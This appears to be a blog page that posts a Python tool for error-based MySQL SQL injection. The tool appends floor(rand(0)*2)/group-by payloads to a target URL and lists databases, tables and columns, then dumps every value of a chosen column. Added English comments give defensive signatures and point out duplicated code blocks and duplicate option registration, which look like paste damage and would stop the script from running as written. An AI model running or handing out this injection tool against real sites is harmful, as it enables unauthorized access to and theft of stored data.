代码展示墙:
关于注释和解析，以后会补上。
现在只是先将代码保存在这里。
# -*- coding: utf-8 -*-
import requests
import sys
import hashlib
from optparse import OptionParser
import re
import requests
import sys
import hashlib
from optparse import OptionParser
import re
# Command-line interface.  Each option narrows the enumeration level
# (databases -> tables -> columns -> rows) and main() dispatches on which
# of them were supplied; all four are optional strings defaulting to None.
parser=OptionParser()
parser.add_option("-D", "--Database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--Table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--Column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--Url", action="store",type="string",dest="url",help="Please input test url")
# NOTE(review): "-T", "-C" and "-U" are registered a second time below.
# optparse's default conflict_handler is "error", so a repeated option
# string raises optparse.OptionConflictError before parse_args() is ever
# reached.  The repetition may be a copy/paste artifact of the page rather
# than the original script -- confirm against the source file.
parser.add_option("-T", "--Table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--Column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--Url", action="store",type="string",dest="url",help="Please input test url")
# Parsed at import time; `options` is read as a module-level global by main().
(options,args) = parser.parse_args()
def main():
    """Dispatch to the enumeration routine that matches the options given.

    Branches are ordered from least to most specific: ``-U`` alone lists
    databases, ``-U -D`` lists tables, ``-U -D -T`` lists columns, and all
    four dump the rows of one column.  With no options at all the help text
    is printed and the process exits.

    Any other combination (for example ``-D`` without ``-U``, or ``-U -T``
    without ``-D``) matches no branch and the function returns silently
    with no output, because there is no trailing ``else``.  Reads the
    module-level ``options`` and ``parser`` globals; returns None.
    """
    if options.url == None and options.database == None and options.table == None and options.column == None:
        print("Please read the help")
        parser.print_help()
        sys.exit()
    elif options.url != None and options.database ==None and options.table == None and options.column == None:
        getAllDatabases(options.url)
    elif options.url != None and options.database !=None and options.table == None and options.column == None:
        getAllTables(options.url,options.database)
    elif options.url != None and options.database !=None and options.table != None and options.column == None:
        # Note the argument order: (url, table, database).
        getAllColumnsByTable(options.url,options.table,options.database)
    elif options.url != None and options.database !=None and options.table != None and options.column != None:
        getAllContent(options.url,options.column,options.table,options.database)
def http_get(url):
    """Issue a plain GET to *url* and return the raw response body.

    Thin wrapper around ``requests.get``: no timeout, headers, session or
    status check are applied, and whatever body the server returns
    (bytes) is handed back unchanged for the callers to regex-search.
    """
    return requests.get(url).content
def getAllDatabases(url):
    """Enumerate schema names through the injectable parameter in *url* and print them.

    Two payload shapes are appended to ``url``: first one that selects
    ``count(schema_name)`` from ``information_schema.schemata``, then one
    per index ``i`` that selects a single ``schema_name`` with ``limit i,1``.
    The SQL wraps each value in ``'^_^'`` markers via ``concat`` and the
    regex below pulls it back out of the HTTP response, so the script
    presumably relies on the database's error text being echoed into the
    page (the ``count(*) ... floor(rand(0)*2) ... group by x`` construction
    is the classic way to provoke such an error).

    Defensive notes: this only works against an endpoint that concatenates
    untrusted input into SQL *and* returns raw database errors to the
    client.  Parameterised queries remove the first condition and
    suppressing verbose error output the second; requests containing
    ``information_schema``, ``floor(rand(0)*2)`` together with ``group by``,
    or the ``^_^`` marker are cheap signatures for WAF rules and log review.

    Args:
        url: target URL whose trailing parameter value is the injection
            point; the payload is appended after a literal " and ".
    Raises:
        AttributeError: when a response lacks the markers (``re.search``
            returns None and ``.group`` is called on it).
        ValueError: when the text between the markers is not an integer.
    """
    db_number_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(schema_name),'^_^') from information_schema.schemata),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) "
    html=http_get(db_number_payload)
    # http_get returns bytes; str() is used so the regex can run over it.
    htmlc=str(html)
    db_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc,re.M).group(1))
    # One request per schema: limit i,1 selects the i-th row.
    for i in range(db_number):
        db_name_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',schema_name,'^_^') from information_schema.schemata limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % i
        db_name_get=http_get(db_name_payload)
        db_name_res=str(db_name_get)
        db_name_res_re=re.search(r'\^_\^(.*?)\^_\^',db_name_res,re.M)
        db_name=db_name_res_re.group(1)
        print(db_name)
def getAllTables(url,database):
    """Print every table name in *database*, using the same marker/regex extraction as getAllDatabases.

    A first payload reads ``count(table_name)`` from
    ``information_schema.tables`` filtered on ``table_schema``; the loop
    then fetches one ``table_name`` per index with ``limit i,1``.

    Args:
        url: injectable target URL (payload appended after " and ").
        database: schema name, substituted into the SQL with %-formatting.
    Raises:
        AttributeError / ValueError: as in getAllDatabases, when a response
            does not contain an integer / value between ``^_^`` markers.
    """
    db_table_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(table_name),'^_^') from information_schema.tables where table_schema='%s'),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % database
    html=str(http_get(db_table_payload))
    db_table_number=int(re.search(r'\^_\^(.*?)\^_\^',html).group(1))
    for i in range(db_table_number):
        db_name_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',table_name,'^_^') from information_schema.tables where table_schema='%s' limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (database,i)
        htmlc=str(http_get(db_name_payload))
        db_table_name=re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1)
        print(db_table_name)
    # NOTE(review): the eight lines below repeat the block above verbatim.
    # This looks like a paste artifact; if it is genuine code the whole
    # enumeration runs a second time and every table name is printed twice.
    db_table_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(table_name),'^_^') from information_schema.tables where table_schema='%s'),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % database
    html=str(http_get(db_table_payload))
    db_table_number=int(re.search(r'\^_\^(.*?)\^_\^',html).group(1))
    for i in range(db_table_number):
        db_name_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',table_name,'^_^') from information_schema.tables where table_schema='%s' limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (database,i)
        htmlc=str(http_get(db_name_payload))
        db_table_name=re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1)
        print(db_table_name)
def getAllColumnsByTable(url,table,database):
    """Print the column names of *table*, using the same marker/regex extraction as getAllDatabases.

    The count and per-index payloads read from ``information_schema.columns``
    filtered only on ``table_name``.  The *database* argument is accepted
    but never used in the SQL, so a table name that exists in several
    schemas yields the columns of all of them.

    Args:
        url: injectable target URL (payload appended after " and ").
        table: table name, substituted into the SQL with %-formatting.
        database: unused (kept for the call signature used by main()).
    Raises:
        AttributeError / ValueError: as in getAllDatabases, when a response
            does not contain an integer / value between ``^_^`` markers.
    """
    db_cl_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(column_name),'^_^') from information_schema.columns where table_name='%s'),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % table
    htmlc=str(http_get(db_cl_payload))
    db_cl_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1))
    #print(db_cl_number)
    for i in range(db_cl_number):
        db_cl_name_payload=url + " and (select 1 from (select count(*),concat((select concat('^_^',column_name,'^_^') from information_schema.columns where table_name='%s' limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (table,i)
        html_cl=str(http_get(db_cl_name_payload))
        db_cl_name=re.search(r'\^_\^(.*?)\^_\^',html_cl).group(1)
        print(db_cl_name)
    # NOTE(review): the nine lines below repeat the block above verbatim.
    # This looks like a paste artifact; if it is genuine code the whole
    # enumeration runs a second time and every column name is printed twice.
    db_cl_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(column_name),'^_^') from information_schema.columns where table_name='%s'),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % table
    htmlc=str(http_get(db_cl_payload))
    db_cl_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1))
    #print(db_cl_number)
    for i in range(db_cl_number):
        db_cl_name_payload=url + " and (select 1 from (select count(*),concat((select concat('^_^',column_name,'^_^') from information_schema.columns where table_name='%s' limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (table,i)
        html_cl=str(http_get(db_cl_name_payload))
        db_cl_name=re.search(r'\^_\^(.*?)\^_\^',html_cl).group(1)
        print(db_cl_name)
def getAllContent(url,column,table,database):
    """Print every value of *column* in ``database.table``, using the same marker/regex extraction as getAllDatabases.

    A first payload reads ``count(column)`` from ``database.table``; the
    loop then reads one value per index with ``limit i,1``.  The column,
    database and table names come from the command line and are
    substituted straight into the SQL with %-formatting.

    Args:
        url: injectable target URL (payload appended after " and ").
        column: column to read.
        table: table to read from.
        database: schema that owns *table*.
    Raises:
        AttributeError / ValueError: as in getAllDatabases, when a response
            does not contain an integer / value between ``^_^`` markers.
    """
    db_ct_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(%s),'^_^') from %s.%s),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (column,database,table)
    htmlc=str(http_get(db_ct_payload))
    db_ct_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1))
    for i in range(db_ct_number):
        db_ct_name_payload=url + " and (select 1 from (select count(*),concat((select concat('^_^',%s,'^_^') from %s.%s limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (column,database,table,i)
        html_cl=str(http_get(db_ct_name_payload))
        db_ct_string=re.search(r'\^_\^(.*?)\^_\^',html_cl).group(1)
        print(db_ct_string)
    # NOTE(review): the eight lines below repeat the block above verbatim.
    # This looks like a paste artifact; if it is genuine code the whole
    # dump runs a second time and every value is printed twice.
    db_ct_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(%s),'^_^') from %s.%s),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (column,database,table)
    htmlc=str(http_get(db_ct_payload))
    db_ct_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1))
    for i in range(db_ct_number):
        db_ct_name_payload=url + " and (select 1 from (select count(*),concat((select concat('^_^',%s,'^_^') from %s.%s limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (column,database,table,i)
        html_cl=str(http_get(db_ct_name_payload))
        db_ct_string=re.search(r'\^_\^(.*?)\^_\^',html_cl).group(1)
        print(db_ct_string)
# Runs unconditionally at import time: there is no ``if __name__ == "__main__"``
# guard, so merely importing this module parses sys.argv and may send requests.
main()